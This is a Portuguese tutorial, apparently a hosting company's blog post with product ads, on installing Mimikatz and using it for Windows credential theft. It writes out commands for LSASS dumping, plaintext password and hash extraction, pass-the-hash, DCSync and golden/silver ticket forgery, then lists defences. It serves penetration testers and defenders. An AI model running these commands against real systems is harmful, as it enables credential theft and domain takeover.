Como Instalar e Usar o Mimikatz: Um Guia Completo para Profissionais de Segurança

Mimikatz é uma das ferramentas mais conhecidas e amplamente discutidas no mundo da cibersegurança. Originalmente desenvolvida como prova de conceito para demonstrar vulnerabilidades na autenticação do Windows, tornou-se um instrumento essencial no conjunto de ferramentas de testadores de penetração, red teamers e investigadores de segurança. Este guia fornece um percurso detalhado sobre o que é o Mimikatz, quem o utiliza e como instalá-lo e operá-lo de forma responsável num ambiente controlado.

> Aviso Legal: O Mimikatz deve ser utilizado apenas em sistemas que possui ou para os quais tem autorização escrita explícita para testar. A utilização não autorizada é ilegal e pode resultar em graves penalidades criminais. Este guia destina-se exclusivamente a fins educativos e testes de segurança legítimos.

—

O Que É o Mimikatz?

Mimikatz é uma ferramenta de segurança Windows de código aberto criada pelo investigador de segurança francês Benjamin Delpy. A sua função principal é extrair credenciais de autenticação — incluindo palavras-passe em texto simples, hashes de palavras-passe NTLM, códigos PIN e tickets Kerberos — diretamente da memória de um sistema Windows (especificamente do processo LSASS).

Como o Windows historicamente armazenava credenciais em cache na memória para suportar autenticação contínua entre serviços, o Mimikatz conseguiu expor uma fraqueza fundamental de design na forma como o sistema operativo tratava dados sensíveis de autenticação. A Microsoft introduziu desde então mitigações como o Credential Guard e o grupo de segurança Protected Users, mas o Mimikatz continua a evoluir em paralelo com estas defesas, tornando-o uma ferramenta de referência inestimável para compreender o panorama atual de ameaças.

Principais Capacidades do Mimikatz

• Extração de palavras-passe em texto simples da memória do Windows (LSASS)
• Extração de hashes NTLM da base de dados SAM e do Active Directory
• Extração e manipulação de tickets Kerberos (ataques Golden Ticket, Silver Ticket)
• Pass-the-Hash (PtH) — autenticação usando hashes capturados
• Ataques Pass-the-Ticket (PtT) usando tickets Kerberos roubados
• Ataques DCSync para replicar dados do controlador de domínio sem acesso direto

—

Quem Utiliza o Mimikatz e Porquê?

Casos de Uso Legítimos de Segurança

O Mimikatz é utilizado principalmente por profissionais de segurança da informação nos seguintes contextos:

• Testes de penetração — Simulação de ataques reais de roubo de credenciais para avaliar a eficácia das defesas de uma organização contra um adversário que obteve acesso inicial.
• Operações de red team — Emulação de técnicas de ameaças persistentes avançadas (APT) para testar as capacidades de deteção e resposta de blue teams e analistas SOC.
• Auditorias de segurança — Avaliação de se as palavras-passe e os tickets Kerberos são armazenados e protegidos de acordo com as melhores práticas de segurança.
• Formação e sensibilização — Demonstração a administradores de sistemas e engenheiros de como os ataques baseados em credenciais funcionam na prática, tornando ameaças abstratas tangíveis e acionáveis.
• Investigação de vulnerabilidades — Identificação de novas fraquezas nos mecanismos de autenticação do Windows antes que atores maliciosos as possam explorar.

Uso Malicioso

Infelizmente, o Mimikatz é também uma ferramenta favorita entre agentes de ameaças devido à sua eficácia. Os casos de uso malicioso mais comuns incluem:

• Ataques Pass-the-Hash — Autenticação em sistemas usando hashes NTLM capturados sem nunca conhecer a palavra-passe original em texto simples.
• Ataques Pass-the-Ticket — Utilização de tickets Kerberos roubados para se fazer passar por utilizadores legítimos numa rede.
• Persistência pós-exploração — Recolha de credenciais após uma violação inicial para se mover lateralmente através de uma rede e escalar privilégios.
• Ataques Golden Ticket — Falsificação de Ticket Granting Tickets (TGTs) Kerberos para obter acesso persistente e quase ilimitado aos recursos do domínio.

Compreender como os atacantes utilizam o Mimikatz é precisamente a razão pela qual os defensores precisam de estar familiarizados com ele. Se está a gerir um ambiente de VPS Hosting ou a administrar infraestrutura dedicada, conhecer estes vetores de ataque ajuda-o a construir defesas mais resilientes.

—

Pré-requisitos

Antes de prosseguir, certifique-se de que as seguintes condições estão satisfeitas no seu ambiente de teste autorizado:

> Melhor Prática: Realize sempre os testes com Mimikatz dentro de uma máquina virtual isolada ou de um servidor de laboratório dedicado. Se precisar de um ambiente seguro e isolado para laboratórios de testes de penetração, considere implementar uma instância de VPS Hosting com uma imagem Windows para manter os seus testes completamente separados da infraestrutura de produção.

—

Passo 1: Descarregar o Mimikatz

1.1 Visitar o Repositório Oficial do GitHub

O Mimikatz é mantido como um projeto de código aberto. Descarregue-o sempre a partir da fonte oficial para evitar versões adulteradas ou trojanizadas:

Repositório Oficial: https://github.com/gentilkiwi/mimikatz

1.2 Descarregar a Versão Mais Recente

1. Navegue até à secção Releases do repositório (barra lateral direita ou através do caminho URL /releases).
2. Localize a versão estável mais recente.
3. Descarregue o arquivo pré-compilado — normalmente denominado mimikatz_trunk.zip.

1.3 Extrair o Arquivo

1. Clique com o botão direito no ficheiro ZIP descarregado.
2. Selecione Extrair Tudo…
3. Escolha um diretório de destino, por exemplo: C:SecurityToolsMimikatz

Após a extração, encontrará dois subdiretórios:

• x64 — binários de 64 bits (utilize este em sistemas modernos)
• Win32 — binários de 32 bits (para sistemas legados)

O executável principal com o qual irá trabalhar é mimikatz.exe.

—

Passo 2: Executar o Mimikatz

2.1 Abrir uma Linha de Comandos Elevada

O Mimikatz requer privilégios administrativos para interagir com regiões de memória protegidas. Para iniciar uma shell elevada:

1. Prima Windows + X
2. Selecione Linha de Comandos (Admin) ou Windows PowerShell (Admin)
3. Clique em Sim no prompt UAC

2.2 Navegar para o Diretório do Mimikatz

cd C:SecurityToolsMimikatzx64

Verifique que mimikatz.exe está presente neste diretório:

dir mimikatz.exe

2.3 Iniciar o Mimikatz

mimikatz.exe

Se a ferramenta iniciar com sucesso, verá o banner do Mimikatz e o prompt interativo:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

O prompt mimikatz # confirma que a ferramenta está em execução e pronta para aceitar comandos.

2.4 Ativar Privilégios de Depuração

Antes de executar a maioria dos comandos de extração de credenciais, eleve os próprios privilégios do Mimikatz dentro da sessão:

mimikatz # privilege::debug

Resultado esperado:

Privilege '20' OK

Isto concede ao Mimikatz o direito SeDebugPrivilege, que é necessário para ler a memória de processos protegidos como o LSASS.

—

Passo 3: Comandos Principais do Mimikatz

3.1 Extrair Palavras-passe em Texto Simples da Memória

Esta é a capacidade mais conhecida do Mimikatz. Lê credenciais em cache pelo fornecedor de autenticação WDigest diretamente da memória LSASS:

mimikatz # sekurlsa::logonpasswords

O que retorna:

• Nomes de utilizadores com sessão iniciada
• Nomes de domínio
• Palavras-passe em texto simples (se o cache WDigest estiver ativado)
• Hashes NTLM
• Hashes SHA1
• Credenciais Kerberos

> Nota: No Windows 8.1 e posterior, a Microsoft desativou o cache de texto simples WDigest por padrão. No entanto, atacantes (e testadores) podem reativá-lo através de uma chave de registo, razão pela qual este continua a ser um caso de teste relevante.

3.2 Apresentar Palavras-passe Armazenadas (Comando Alternativo)

mimikatz # sekurlsa::passwords

Este comando fornece uma visão simplificada das credenciais disponíveis na memória do sistema.

3.3 Extrair Credenciais de um Ficheiro de Dump de Memória

Se não conseguir executar o Mimikatz diretamente no sistema alvo, pode primeiro capturar um dump de memória LSASS e analisá-lo offline:

Criar o dump usando o Gestor de Tarefas:

1. Abrir o Gestor de Tarefas → separador Detalhes
2. Clique com o botão direito em lsass.exe → Criar ficheiro de dump

Ou utilize o ProcDump (do Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analisar o dump com o Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Listar Tickets Kerberos

Para enumerar todos os tickets Kerberos presentes na sessão de início de sessão atual:

mimikatz # kerberos::list

Para listar tickets com detalhes completos incluindo chaves de sessão:

mimikatz # kerberos::list /export

Isto exporta cada ticket como um ficheiro .kirbi, que pode ser utilizado em ataques Pass-the-Ticket.

3.5 Exportar Credenciais para um Ficheiro

Para guardar o resultado de um dump de credenciais num ficheiro de texto para análise posterior:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

O resultado será escrito em credentials.txt no caminho especificado.

—

Passo 4: Técnicas Avançadas do Mimikatz

4.1 Ataque Pass-the-Hash (PtH)

O Pass-the-Hash permite a autenticação num sistema remoto usando um hash NTLM capturado, sem necessitar da palavra-passe em texto simples:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Isto inicia um novo processo cmd.exe autenticado como o utilizador especificado usando o hash.

4.2 Ataque Golden Ticket

Um Golden Ticket é um TGT Kerberos falsificado assinado com o hash da palavra-passe da conta KRBTGT, concedendo ao detentor acesso quase ilimitado aos recursos do domínio. Isto requer o hash KRBTGT, que pode ser obtido via DCSync:

Passo 1 — DCSync para extrair o hash KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Passo 2 — Criar o Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Passo 3 — Injetar o ticket:

mimikatz # kerberos::ptt golden.kirbi

4.3 Extrair Hashes NTLM da Base de Dados SAM

Para extrair hashes de contas locais da base de dados SAM (requer privilégios SYSTEM):

mimikatz # lsadump::sam

4.4 Extrair Segredos do LSA

mimikatz # lsadump::secrets

Isto recupera segredos LSA, que podem incluir credenciais de contas de serviço, credenciais de domínio em cache e outros dados sensíveis armazenados pela Autoridade de Segurança Local.

4.5 Ataque Silver Ticket

Um Silver Ticket visa um serviço específico em vez de todo o domínio. Requer o hash NTLM da conta do serviço alvo:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Passo 5: Contramedidas Defensivas

Compreender como o Mimikatz funciona é apenas metade da equação. A outra metade é saber como se defender contra ele. Se gere servidores Windows — seja em Servidores Dedicados ou infraestrutura baseada na nuvem — as seguintes mitigações são críticas:

5.1 Ativar o Credential Guard

O Windows Credential Guard utiliza segurança baseada em virtualização (VBS) para isolar o LSASS num contentor protegido, impedindo o Mimikatz de ler credenciais diretamente da memória.

Ativar via Política de Grupo:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Desativar a Autenticação WDigest

Previna o cache de palavras-passe em texto simples desativando o WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Adicionar Utilizadores ao Grupo Protected Users

Os membros do grupo de segurança Protected Users não podem autenticar usando NTLM, DES ou encriptação Kerberos RC4, limitando significativamente a eficácia dos ataques de roubo de credenciais.

5.4 Implementar Proteção LSA (RunAsPPL)

Ative o Protected Process Light (PPL) para o LSASS para prevenir acesso não autorizado à memória:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Monitorizar Indicadores do Mimikatz

Configure a sua solução SIEM ou EDR para alertar sobre:

• Acesso à memória lsass.exe a partir de processos inesperados
• SeDebugPrivilege sendo concedido a processos não pertencentes ao sistema
• Padrões suspeitos de comandos sekurlsa, kerberos ou lsadump nos registos de processos
• Eventos incomuns de criação de ficheiros de dump LSASS (Event ID 4656, 4663)

5.6 Manter os Sistemas Atualizados

Muitas técnicas do Mimikatz exploram vulnerabilidades conhecidas ou comportamentos legados. Manter o Windows e o Active Directory totalmente atualizados elimina classes inteiras de vetores de ataque.

—

Mimikatz no Contexto de Infraestrutura de Alojamento Seguro

Para organizações que executam aplicações web, APIs ou serviços internos, o risco de roubo de credenciais estende-se para além da estação de trabalho local. Se um atacante obtiver acesso ao seu ambiente de servidor, ferramentas como o Mimikatz podem ser utilizadas para escalar privilégios e mover-se lateralmente.

Escolher um fornecedor de alojamento que priorize a segurança ao nível da infraestrutura é uma camada importante de defesa. Quer necessite de Alojamento Web Partilhado para projetos menores ou de Servidores Dedicados para cargas de trabalho empresariais, garantir que o seu ambiente de alojamento inclui proteção DDoS, isolamento de rede e atualizações de segurança regulares reduz a sua superfície de ataque global.

Para equipas que gerem ambientes Active Directory ou aplicações baseadas em Windows, combinar a sua infraestrutura com Certificados SSL devidamente configurados garante que as credenciais transmitidas entre clientes e servidores são encriptadas em trânsito — acrescentando mais uma camada de proteção contra interceção.

—

Resumo: Referência de Comandos do Mimikatz

—

Conclusão

O Mimikatz continua a ser uma das ferramentas mais poderosas e instrutivas disponíveis para profissionais de cibersegurança. A sua capacidade de expor fraquezas fundamentais nos mecanismos de autenticação do Windows impulsionou melhorias significativas na forma como a Microsoft concebe a proteção de credenciais — desde o Credential Guard ao Protected Users e ao LSA PPL. Para testadores de penetração, red teamers e investigadores de segurança, uma compreensão aprofundada do Mimikatz não é opcional; é essencial.

Os princípios fundamentais a ter sempre em mente:

• Obtenha sempre autorização escrita explícita antes de utilizar o Mimikatz em qualquer sistema.
• Utilize ambientes isolados — máquinas virtuais ou servidores de laboratório dedicados — para evitar exposição acidental.
• Compreenda as defesas tão profundamente quanto compreende os ataques.
• Mantenha-se atualizado — tanto o Mimikatz como as defesas do Windows evoluem continuamente.

Ao combinar o conhecimento prático de ferramentas como o Mimikatz com uma infraestrutura de alojamento segura e bem configurada, as equipas de segurança podem construir defesas genuinamente testadas contra técnicas de ataque do mundo real, em vez de suposições teóricas.

—

*A AlexHost fornece soluções de alojamento seguras e de alto desempenho concebidas a pensar em profissionais conscientes da segurança. Explore os nossos planos de VPS Hosting e Servidores Dedicados para construir o seu próximo laboratório seguro ou ambiente de produção.*